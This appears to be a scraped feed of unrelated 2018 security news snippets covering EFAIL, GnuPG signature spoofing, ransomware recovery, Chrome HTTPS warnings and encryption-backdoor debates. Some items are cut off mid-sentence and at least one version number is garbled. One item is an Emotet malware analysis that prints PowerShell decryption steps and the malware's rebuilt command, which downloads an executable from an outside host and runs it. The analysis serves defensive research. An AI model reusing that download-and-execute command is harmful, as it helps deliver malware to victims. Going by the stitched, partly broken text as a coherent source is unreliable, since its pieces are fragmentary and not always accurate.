Foldering is a way of communicating without sending a message.
A vulnerability affecting GnuPG has made some of the widely used email encryption software vulnerable to digital signature spoofing for many years. The list of affected programs includes Enigmail and GPGTools. About the vulnerability (CVE-2018-12020) CVE-2018-12020, dubbed “SigSpoof” by Marcus Brinkmann, the researcher which found it, arises from “weak design choices.” “The signature verification routine in Enigmail 188.8.131.52, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a “–status-fd 2” option, which … More
The post Vulnerability in GnuPG allowed digital signature spoofing for decades appeared first on Help Net Security.
In this exclusive interview from April, the head of RSA Labs* says that keeping up with bad guys is only half the job. Security firms also need to work hard to stay relevant as trends like cloud adoption, containerization, microservices and mobility shift the ground under information security providers. It is common knowledge in the security space...
Recently, Apricorn announced new research highlighting that 95 percent of surveyed organisations in the UK recognise problems with mobile and remote working, and nearly one in five (18%) suggest their mobile workers don’t care about security. In this podcast, Jon Fielding, Managing Director for Apricorn in EMEA, talks about the challenges related to securing mobile workers, and how they can be solved. Here’s a transcript of the podcast for your convenience. Hello, my name’s Jon … More
The post The challenges of securing mobile workers and keeping data secure appeared first on Help Net Security.
Attackers demanded £120,000 from a Dorset business after infecting the company’s computer systems with crypto-ransomware. According to the Bournemouth Daily Echo, ransomware actors targeted an engineering firm located in Dorset, a county in the south-western part of England. A spokeswoman for the Dorset Police confirmed the attack and provided additional insight into the malefactors’ demands. […]… Read More
The post Ransomware Attackers Demand £120,000 from Dorset Business appeared first on The State of Security.
The Department of Justice and FBI have wanted tech companies to remove the encryption or weaken their algorithms for a
Imagine the panic and concern that hits as you look at a screen that says: “All files on your computer have been locked. Please pay the ransom within 24 hours to get the key … or else.”
From the days of ransomware being distributed on floppy disks to modern-day attacks like WannaCry and Petya spreading around the world in minutes, this may be your image of ransomware recovery. Ransomware either locks your computer or your data before demanding a fee in exchange for the supposed safe return of your critical assets.
Unfortunately, the actual costs associated with ransomware go well beyond simply paying a ransom. The disruption this form of attack causes can bring operations to a halt — affecting the organization’s bottom line, reputation and brand.
Ransomware: To Err Is Human
Aside from blocking organizations from accessing their own data, cybercriminals also use ransomware to hide the delivery of other malware, steal data or simply cause business disruption. The growing sophistication and proliferation of ransomware over the past few years has led many companies to anticipate an eventual attack.
Recognizing the inevitability of a ransomware incident is a good first step toward mitigating this threat. But the reality is that organizations must immediately assess how their business has been disrupted — whether confidential or proprietary data is at risk and whether their recovery plan is sufficient — in the event of an attack.
Historically, ransomware payloads have been delivered via email attachments, malicious or hijacked websites and adware — just to name a few. But methods of ransomware deployment and execution usually have one thing in common: human intervention. Security training has helped educate users to be wary of suspicious emails from untrusted sources or unusual content, and this is a great start.
However, as more and more ransomware variants spread via broader means, it’s critical to augment ongoing user education with technical controls and processes for optimal protection. For example, it is crucial to update security patches for all operating systems and software, especially antivirus and antimalware tools, for the latest known attack vectors. It is also important to minimize and monitor system and data access permissions based on least privileged access and job functions.
Still, preventative measures can only do so much because, well, humans are human.
Known malware or vulnerabilities aren’t actually known until they are discovered, and protection is not provided until the antivirus and antimalware tools have been updated to detect these vulnerabilities. This recursive cycle of applying protection only after finding the problem requires us to think about additional methods that provide preventative protection and instant remediation in the event of an attack or infection.
As an example, let’s assume that someone (or something) has infiltrated your system or network. In an unprotected environment, data exfiltration is rudimentary once the system or network has been compromised. If the data is encrypted and unable to be decrypted without the proper authentication and authorization, however, data exfiltration is blocked even though the encrypted bits may be accessible to the attacker. This basic layer of protection gives you the peace of mind that even if malware or ransomware gets to your data, it is safe from unauthorized use or disclosure.
Make Backups, Encryption and Cloud Storage Your Priority
Even if your data is protected against theft or unauthorized disclosure, the files may still be locked by the ransomware. How can you regain access? According to an alert from the Department of Homeland Security (DHS) on ransomware and recent variants, it is critical to have a secure data backup and recovery process.
The DHS advised organizations to:
- Implement a backup and recovery plan for all critical data;
- Regularly test backups to limit the impact of a data breach and accelerate the recovery process; and
- Isolate critical backups from the network for maximum protection if network-connected backups are affected by ransomware.
While having a backup and recovery strategy is considered a best practice, the enormous amount of data organizations use every day can be challenging to back up, especially on a frequent basis. However, options for backing up large quantities of data exist today in the form of cloud storage.
The cloud has emerged as a low-cost alternative for backup and archiving, especially object storage where application programming interface (API) connectivity and geographic location choices make isolating backup data from the network relatively easy and inexpensive. But cloud storage comes with its own unique challenges, particularly privacy.
With the right approach, object store dependency and privacy concerns can be alleviated. Organizations must have technical and operational processes in place that allow data to be archived in object stores but stored in a way that explicitly blocks cloud service providers (CSPs) from accessing that data. In other words, the right approach is to copy, move, back up and archive data while encrypted and to make this practice a key part of the organization’s data protection strategy.
How to Simplify Ransomware Recovery
Ransomware is designed to enable cybercriminals to take command and control of your systems and business operations for quick financial gain or other malicious intent. Once a successful attack begins, you no longer have control or access to one of your organization’s most valuable assets: its data.
Conversely, the focus of ransomware recovery is all about maintaining control as efficiently and securely as possible. This necessitates making data protection with secure backup and recovery an essential part of your security processes. To align with new regulations, such as the General Data Protection Regulation (GDPR), security controls must be implemented by design and by default so that your data is protected from the time it is collected until the end of its life cycle.
Organizations need to control the who, what, when and how of systems and data that are accessed based on job function or role. This is good security hygiene at its most basic level. By using a strong, data-centric solution that combines encryption, access controls, key management and monitoring — and linking it to a secure backup strategy — organizations can narrow the attack surface for ransomware and better position organizational operations to continue in the face of an attack.
That sounds complex, but it’s not.
With emerging cloud data encryption tools that feature file and object store encryption capabilities, organizations can significantly reduce the risk and cost of ransomware with a single integrated solution that covers role-based access controls, advanced encryption, key management, access monitoring, object storage security with geographic dispersal and native backup and restores capabilities. In addition, these tools manage data protection consistently, whether you are protecting attached storage at the file or volume level or object storage via API — and regardless of whether it is on-premises, in the cloud or a hybrid environment.
Expanding on the concepts of regular backups with encryption and secure cloud storage takes the best practices of good security hygiene and adds layers of data protection, consistency, automation and control to help organizations become better prepared to weather the storm of evolving cyberthreats.
To learn how IBM Multi-Cloud Data Encryption supports ransomware recovery, join us for our upcoming webinar on June 28, 2018, “Guardium Tech Talk: Encrypting Your Object Store Data Without Giving Your Keys to the CSP.”
The post Ransomware Recovery: Maintain Control of Your Data in the Face of an Attack appeared first on Security Intelligence.
There is a simple reason for developers adopting the cloud and cloud-native application architectures. These “tools and methods” allow developers to accelerate innovation and feature delivery in the service of meeting business demands and keeping their enterprise competitive. While these tools and methods make noticeable improvements for DevOps teams, their new operational model creates security concerns and headaches for security practitioners. DevOps methods disaggregate the neatly packaged n-tier, VM-bound application into distributed architectures. The cloud … More
The post Securing microservices and containers: A DevOps how-to guide appeared first on Help Net Security.
In part two of our series on decoding Emotet, (you can catch up on part 1 here), we’ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that are used in the code for the execution.
- System.Runtime.InteropServices.Marshal: used for memory management
- SecureStringToBSTR: used to convert the secure string to decrypted data
- ConvertTo-SecureString: used to convert the encrypted data into secure string
Encryption and PowerShell
There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one method of encrypting with PowerShell, but it’s not what our malware uses. Emotet downloader malware uses AES to encrypt data. So let’s take a look at how AES works.
If the data is encrypted using ConvertTo-SecureString but with NO key, PowerShell will by default use DPAPI. But it will only work for the logged in user on the machine it was encrypted on.
If the data is encrypted using ConvertTo-SecureString with a key, PowerShell will use AES to encrypt the data and it can be decrypted on any machine, by anyone who has the encryption key. Emotet downloader uses AES for encrypting the code, with the key hardcoded in the malware itself.
Code execution flow
In order to get to the encrypted code, we need to first understand the flow of execution. Let’s have a look at how the code is structured.
From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.
Now that we have a usable code structure, we can move on to the next step.
The code above is looking for an encrypted data string that can then be run through SecureString for decryption.
We now have access to the encrypted data from the VBA.
We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.
Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.
For the purpose of this analysis, we’ll save it as encrypted_code.txt.
Now, we’ll pass it to a variable $vEncrypted:
$vEncrypted = [IO.File]::ReadAllText(“absolute_path\encrypted_code.txt”)
There are different ways to achieve the same result. Get-Content can also be used.
Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:
$vDecrypted = ConvertTo-SecureString -String $vEncrypted -k (key goes here)
NOTE: The malware authors would have previously used “ConvertFrom-SecureString” with a key (now hard-coded into the malware code) to encrypt the data. We’re simply reversing the process to extract the encrypted code.
The last step is to now Marshal the SecureString through the SecureString to get the decrypted code.
We’ll store the result in a variable to keep it clean and simple.
$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))
Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). The reason for this is that BSTR converts SecureString string value to a binary string (BSTR) recognized by COM. SecureStringToGlobalAllocUnicode would work as well.
That’s it. $vResult should now have the completely decrypted code with the payload URLs.
Now that we know the code flow, let’s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.
First of all, we’ll pass the encrypted code to the variable $vEncrypted:
As you can see below, the encrypted data has now been stored in our variable vEncrypted:
The next step now is to convert the encrypted data into SecureString by running it through ConvertTo-SecureString function. We will use the key that we found hard-coded into the malware code. We will pass the output to the variable vDecrypted:
In the next step, we will confirm if the conversion was successful or not. As we can see below, the conversion was successful:
Now, the final step to decrypt the data is to Marshal it through SecureStringToBSTR and pass the output to a variable, in this case, vResult:
It’s now time to print the output of the variable and look at the decrypted code!
We will further execute the code to extract the payload URLs and print them to console in a clean and nice way. As we can see in the code, variable $ADCX holds the URLs. We will use the split function as shown in the decrypted code and pass the output to $ADCX.
All we have to do now is print the value of $ADCX to console and we get all the URLs in a list.
We already have the network IOC. At this point, we can go home! But do we ever?
Reconstructing the command-line arguments
Let’s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!
Here’s our PowerShell code, structured and readable:
And here’s the same code, cleaned and beautified:
Now, we will look at all the variables and analyze them one-by-one to reconstruct the complete command-line arguments.
This variable is assigned the value as the output of (new-object) random, which translates to System.random.
Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. We’ll see that in action when we analyze $NSB.
This variable is assigned the value “(new-object) System.Net.WebClient,” which will be used later with DownloadFile to download content from the Internet with the specified URI and save it as a local file. We can have a look at the value assigned to the variable in the image below. These are the attributes that will be used to start the download of the payload.
As we saw earlier, this variable calls on the previously declared variable “nsadasd” in conjunction with “.next”, which turns the argument into the method “random.next.” This, in turn, would return a random number within the specified range (in this case, 10,000 – 282,133). As you can see below, it returns a different value each time it is executed.
$SDC = $env:public + ‘\’ + $NSB + (‘.exe’);
This variable puts together the absolute path for the payload, complete with the file name that is generated by variable NSB.
We have already looked at the $ADCX variable and how to extract the URIs out of it. Now let’s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.
Here’s the way the code is executed by the malware using variables we analyzed above:
Let’s clean up the code to make it more readable:
Now that we know the value that these variables hold, let’s reconstruct the final command-line arguments that will be passed to the system for execution:
This is what it comes down to in the end:
(New-Object) System.Net.WebClient.”DownloadFile”(http://lecap-services.fr/wiB9s.”ToString”(), C:\USers\Public\264415.exe);
The command we have above will initiate the download of the data from the specified URI and save it to a local file as “C:\USers\Public\264415.exe”.
And this final command will start the execution of the payload.
Emotet: a complex malware
Emotet is one of the most active threats seen in the wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.
That’s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.
Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.
But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they've fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it's fixed. Or, if you know how to do it, turn off your e-mail client's ability to process HTML e-mail or -- even better -- stop decrypting e-mails from within the client. There's even more complex advice for more sophisticated users, but if you're one of those, you don't need me to explain this to you.
Consider your encrypted e-mail insecure until this is fixed.
All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It's a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.
Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.
Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names -- the e-mail vulnerability is called "Efail" -- websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.
This simultaneous announcement is best for security. While it's always possible that some organization -- either government or criminal -- has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.
Things get much more complicated when multiple vendors are involved. In this case, Efail isn't a vulnerability in a particular product; it's a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that's close to impossible.
Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn't leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser -- honestly, a really bad idea -- which resulted in details leaking.
After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published -- and lots of press followed.
All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or -- even more problematic -- communities without clear ownership. And that's what we have with OpenPGP. It's even worse when the bug involves the interaction between different parts of a system. In this case, there's nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn't its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.
Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use -- our phones and computers -- to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won't be. Sometimes it'll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don't even know who to blame for that one.
It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn't true for many of the embedded and low-cost Internet of things software packages. They're designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn't anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren't patchable at all. Right now, if you own a digital video recorder that's vulnerable to being recruited for a botnet -- remember Mirai from 2016? -- the only way to patch it is to throw it away and buy a new one.
Patching is starting to fail, which means that we're losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it's hard to see any other viable alternative.
Getting back to e-mail, the truth is that it's incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated and have been difficult to properly use the whole time. If we could start again, we would design something better and more user friendlybut the huge number of legacy applications that use the existing standards mean that we can't. I tell people that if they want to communicate securely with someone, to use one of the secure messaging systems: Signal, Off-the-Record, or -- if having one of those two on your system is itself suspicious -- WhatsApp. Of course they're not perfect, as last week's announcement of a vulnerability (patched within hours) in Signal illustrates. And they're not as flexible as e-mail, but that makes them easier to secure.
This essay previously appeared on Lawfare.com.
Application Developers develop GDPR compliant applications.
Developing GDPR Compliant Applications Guidance
- Part 1: A Developer's Guide to the GDPR
- Part 2: Application Privacy by Design
- Part 3: Minimizing Application Privacy Risk
The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizen's personal data or allow EU citizens sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.
Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.
Part 2: Application Privacy by Design
Part 3: Minimizing Application Privacy Risk
Part 3 provides practical application development techniques that can alleviate an application's privacy risk.
In this podcast recorded at RSA Conference 2018, Asif Karel, Director of Product Management at Qualys, illustrates why certificate visibility and security should not just be bolted on but part of the solution, and he showcases how Qualys CertView can help with that. Here’s a transcript of the podcast for your convenience. Hello. My name is Asif Karel. I am the Director of Product Management at Qualys for certificate management. In this Help Net Security … More
The post Make certificate visibility and security a part of your overall security program appeared first on Help Net Security.
On numbers stations.
Read more of this story at Slashdot.
By Linus Chang, CEO and Founder at Scram Software, Cloud-based services are so commonplace today that it’s tempting to simply trust them with your data. After all, everyone else is
The post Why Encryption Is Now a ‘Need to Have,’ Not Just a ‘Nice to Have’ appeared first on The Cyber Security Place.
The FBI has mislead Congress and the public about the extent to which encrypted cellphones are hampering federal investigations by preventing authorities from accessing the devices–presumably to support the agency’s own agenda to gain backdoor access to them. The FBI claimed that its investigators were locked out of nearly 7,800...
Read more of this story at Slashdot.
Read more of this story at Slashdot.
Google expects HTTPS to become the default, and is preparing users for it by slowly moving Chrome towards showing only negative security indicators. Google’s own numbers showed back in February that 68% of Chrome traffic on both Android and Windows was encrypted, as was 78% of Chrome traffic on both Chrome OS and Mac. By now, these numbers are surely even higher. “Users should expect that the web is safe by default, and they’ll be … More
The post Chrome to dynamically point out “Not secure” HTTP sites appeared first on Help Net Security.
In this episode, #97: we talk with Robert Xiao, the Carnegie Mellon researcher who investigated Location Smart, a free web application that allowed anyone track the location of a mobile phone using just the phone’s number. Also: we welcome University of Washington Researcher Kate Starbird back into the SL studio to talk about her latest...
Read more of this story at Slashdot.
Starting with Chrome 70, Google will mark with a red warning for HTTP content, Big G is continuing its effort to make the web more secure.
Since January 2017, Chrome indicates connection security with an icon in the address bar labeling HTTP connections to sites as non-secure, while since May 2017 Google is marking newly registered sites that serve login pages or password input fields over HTTP as not secure.
Back to the present, in May 2018 the overall encrypted traffic for several Google products is more than over 93%.
“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.
This is an important success for Google, consider that early 2014 only 50% of the traffic was encrypted.
According to the Google Transparency report, around 75% of the pages loaded via Chrome early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.
Given now plan to mark unencrypted connections with a red “Not Secure” warning.
“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.
“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started.” explained Emily Schechter, Product Manager, Chrome Security”
(Security Affairs – Chrome 70, HTTPs)
The post Chrome evolves security indicators by marking with a red warning for HTTP content appeared first on Security Affairs.
A lot changed in the 4 years between the last two OWASP Top 10 lists. In this end user perspective*, security pro Dino Londis talks about those changes and argues that organizations need to address the most common web application attacks, even as they work to engineer a new generation of secure applications. According to OWASP, “Insecure...
A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.
The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim's email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
A few initial comments:
1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don't mean to minimize the seriousness of this attack, but that is a consideration.
2. The vulnerability isn't with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: "No decryption in the e-mail client," and "disable HTML rendering."
3. I've been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it's not bug free.
3. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today's announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.
I'll post other commentaries and analyses as I find them.
We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.
This sounds like a protocol vulnerability, but we'll learn more tomorrow.
A survey of over 500 security professionals has revealed, rather disconcertingly, that most believe governments should regulate the way social networks handle our data, and even install encryption backdoors to that end. At the same time, most experts also berate governments for their lax understanding of social media and digital privacy.
Deeply contrasting results were revealed by the survey conducted by Venafi at RSA Conference 2018, with the help of 512 industry professionals willing to answer questions about the current state of affairs in cyber security.
Surveyors wanted to learn how industry experts view the increasingly blurry lines between cyber security, privacy threats and government regulation. So they asked participants: should governments regulate the collection of personal data by social media companies?
Some 70% of respondents said governments should indeed regulate social media companies’ collection of personal data to protect user privacy. Meanwhile, 72% said bureaucrats don’t understand current digital privacy threats. Worse yet, participants couldn’t articulate exactly what governments should do to protect our privacy online.
Kevin Bocek, VP of security strategy and threat intelligence at Venafi, believes the results are “disturbing”
“While security professionals agree that government officials do not understand the nuances of social media and digital privacy,” he said, “they’re still looking to them to regulate the technology that permeates our daily lives.”
45% of the respondents went as far as to say that governments should be able to impose encryption backdoors on private companies – in other words, to allow the government to obtain anyone’s personal data whenever it wants.
Bocek believes this would motivate bad actors to pour all their resources into stealing such backdoors and then sell them to the highest bidders on the underground web.
The survey did reveal some positive numbers as well: 64% of respondents say their personal encryption usage has increased due to recent geopolitical changes, up from 45% in a similar survey conducted last year.
In this podcast recorded at RSA Conference 2018, Francis Knott, VP of Business Development at Silent Circle, talks about the modern privacy landscape, and introduces Silent Circle’s Silent Phone and GoSilent products. Here’s a transcript of the podcast for your convenience. We are here at the RSA Conference with Francis Knott, the VP of Business Development at Silent Circle, to discuss the recent claims by Homeland Security that the organization has observed anomalous activity in … More
The post Protecting your business behind a shield of privacy appeared first on Help Net Security.
Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.
A group of European security expert has discovered a set of critical vulnerabilities in PGP and S/Mime encryption tools that could reveal your encrypted emails in plain text, also the ones you sent in the past.
Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, a professor of Computer Security at the Münster University of Applied Sciences, warned the Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage due to vulnerabilities and the worst news is that currently there are no reliable fixes.
There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now. Also read @EFF’s blog post on this issue: https://t.co/zJh2YHhE5q #efail 2/4
— Sebastian Schinzel (@seecurity) May 14, 2018
The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF), the organization also recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.
“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF.
“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”
“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.
Schnizel will disclose full details on Tuesday morning at 0700 UTC.
(Security Affairs – privacy, hacking)
On May 10th, 2018, the online hacktivist group Anonymous conducted a
This is a post from HackRead.com Read the original post: Anonymous hacks Russian Govt website against ongoing censorship
Scammers designed a phishing website and encrypted it with the Advanced Encrypted Standard (AES) in their attempts to steal unsuspecting users’ Apple IDs. Researchers at Trend Micro came across the phishing campaign on 30 April. It all began when they received an email designed to look like it came from Apple. The email warned recipients […]… Read More
The post Phishing Site Encrypted With AES Designed to Steal Users’ Apple IDs appeared first on The State of Security.
In recent months, the encryption debate has heated up once again. Most recently, some shock waves were sent across the industry when ThreatWire reported a new tool, known as GrayKey, which could decrypt the latest versions of the iPhone. Fortunately, that tool is only available to law enforcement agencies… for now. The point to be […]… Read More
Sucuri aims at keeping the internet safe. That is why we are so keen on informing our customers of potential threats. We have posted many articles regarding ecommerce security breaches that steal credit card information, as well as the risks for ecommerce site owners.
There can be many dangers when purchasing through a website, and with so many cyber threats attacking ecommerce platforms and payment gateways, it’s more important than ever to reassure your customers by implementing and maintaining Payment Card Industry (PCI) Compliance.
This article says that the Virginia Beach police are looking to buy encrypted radios.
Virginia Beach police believe encryption will prevent criminals from listening to police communications. They said officer safety would increase and citizens would be better protected.
Someone should ask them if they want those radios to have a backdoor.
Last month, Wired published a long article about Ray Ozzie and his supposed new scheme for adding a backdoor in encrypted devices. It's a weird article. It paints Ozzie's proposal as something that "attains the impossible" and "satisfies both law enforcement and privacy purists," when (1) it's barely a proposal, and (2) it's essentially the same key escrow scheme we've been hearing about for decades.
Basically, each device has a unique public/private key pair and a secure processor. The public key goes into the processor and the device, and is used to encrypt whatever user key encrypts the data. The private key is stored in a secure database, available to law enforcement on demand. The only other trick is that for law enforcement to use that key, they have to put the device in some sort of irreversible recovery mode, which means it can never be used again. That's basically it.
I have no idea why anyone is talking as if this were anything new. Several cryptographers have already explained why this key escrow scheme is no better than any other key escrow scheme. The short answer is (1) we won't be able to secure that database of backdoor keys, (2) we don't know how to build the secure coprocessor the scheme requires, and (3) it solves none of the policy problems around the whole system. This is the typical mistake non-cryptographers make when they approach this problem: they think that the hard part is the cryptography to create the backdoor. That's actually the easy part. The hard part is ensuring that it's only used by the good guys, and there's nothing in Ozzie's proposal that addresses any of that.
I worry that this kind of thing is damaging in the long run. There should be some rule that any backdoor or key escrow proposal be a fully specified proposal, not just some cryptography and hand-waving notions about how it will be used in practice. And before it is analyzed and debated, it should have to satisfy some sort of basic security analysis. Otherwise, we'll be swatting pseudo-proposals like this one, while those on the other side of this debate become increasingly convinced that it's possible to design one of these things securely.
Already people are using the National Academies report on backdoors for law enforcement as evidence that engineers are developing workable and secure backdoors. Writing in Lawfare, Alan Z. Rozenshtein claims that the report -- and a related New York Times story -- "undermine the argument that secure third-party access systems are so implausible that it's not even worth trying to develop them." Susan Landau effectively corrects this misconception, but the damage is done.
Here's the thing: it's not hard to design and build a backdoor. What's hard is building the systems -- both technical and procedural -- around them. Here's Rob Graham:
He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.
A bunch of us cryptographers have already explained why we don't think this sort of thing will work in the foreseeable future. We write:
Exceptional access would force Internet system developers to reverse "forward secrecy" design practices that seek to minimize the impact on user privacy when systems are breached. The complexity of today's Internet environment, with millions of apps and globally connected services, means that new law enforcement requirements are likely to introduce unanticipated, hard to detect security flaws. Beyond these and other technical vulnerabilities, the prospect of globally deployed exceptional access systems raises difficult problems about how such an environment would be governed and how to ensure that such systems would respect human rights and the rule of law.
Finally, Matthew Green:
The reason so few of us are willing to bet on massive-scale key escrow systems is that we've thought about it and we don't think it will work. We've looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there's no detection system for key theft, there's no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We're not going to put the data of a few billion people on the line an environment where we believe with high probability that the system will fail.
